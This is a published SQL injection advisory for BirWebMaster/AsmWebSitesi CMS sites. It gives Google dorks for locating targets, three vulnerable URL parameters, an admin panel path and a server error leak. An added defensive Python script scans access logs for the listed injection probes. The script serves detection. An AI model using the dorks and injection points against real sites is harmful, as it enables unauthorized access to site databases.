
BirWebMaster AsmWebSitesi Graphics Web Design Services SQL Injection Vulnerability

Author: KingSkrupellos, Published: 10-10-2018
# Exploit Title : BirWebMaster AsmWebSitesi Graphics Web Design Services SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : asmwebsitesi.net ~ birwebmaster.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060362

#################################################################################################

# Google Dorks :

inurl:''/index.php?sayfa=DuyuruOku''

intext:''Asmwebsitesi.net Asm Web Sitesi''

intext:''BirWebMaster Web Tasarım Hizmetleri''

# Exploits :

/index.php?sayfa=DuyuruOku&id=[SQL Inj]

/index.php?sayfa=SayfaOku&SayfaId=[SQL Inj]

/index.php?sayfa=Galeri&islem=ResimGoster&id=[ID-NUMBER]&page=[SQL Inj]
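
A log check for the three request patterns listed above, added here as an example and not part of the original advisory or the vendor's code. It scans web-server access logs for requests where these parameters carry anything other than a plain integer. The combined log format, the function names, the sample lines and the assumption that these parameters are always numeric are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# sayfa route -> parameters expected to hold only an integer (assumption).
# The advisory names id, SayfaId and page; Galeri's id is checked as well.
NUMERIC_PARAMS = {
    "DuyuruOku": ["id"],
    "SayfaOku": ["SayfaId"],
    "Galeri": ["id", "page"],
}
# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2018:09:00:01 +0300] "GET /index.php?sayfa=DuyuruOku&id=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2018:09:00:05 +0300] "GET /index.php?sayfa=DuyuruOku&id=2%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [10/Oct/2018:09:00:09 +0300] "GET /index.php?sayfa=Galeri&islem=ResimGoster&id=4&page=1%27 HTTP/1.1" 200 298',
    '203.0.113.5 - - [10/Oct/2018:09:01:00 +0300] "GET /index.php?sayfa=SayfaOku&SayfaId=3 HTTP/1.1" 200 4096',
]

def suspicious_params(target):
    """Return [(param, decoded_value)] for numeric parameters that are not integers."""
    url = urlsplit(target)
    if not url.path.endswith("/index.php"):
        return []
    # parse_qs percent-decodes values, so %27 is compared as a literal quote.
    query = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for route in query.get("sayfa", []):
        for name in NUMERIC_PARAMS.get(route, []):
            for value in query.get(name, []):
                if not re.fullmatch(r"[0-9]{1,10}", value):
                    findings.append((name, value))
    return findings

def scan(lines):
    """Return [(client, param, decoded_value)] for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if match:
            for name, value in suspicious_params(match.group(2)):
                hits.append((match.group(1), name, value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only query-string parameters appear in access logs, so values sent in a POST body are not covered by this check.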

# Admin Login Panel Path : /admin/index.php

#################################################################################################

# Example Vulnerable SQL Sites =>


[ Proof of Concept for SQL Inj ] => archive.is/Jvfcu

# SQL Database Error =>

Warning: session_start(): Cannot send session cache limiter - headers already sent
(output started at /home/cumasm/public_html/index.php:1) in /home/cumasm/public_html/db.php on line 7

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################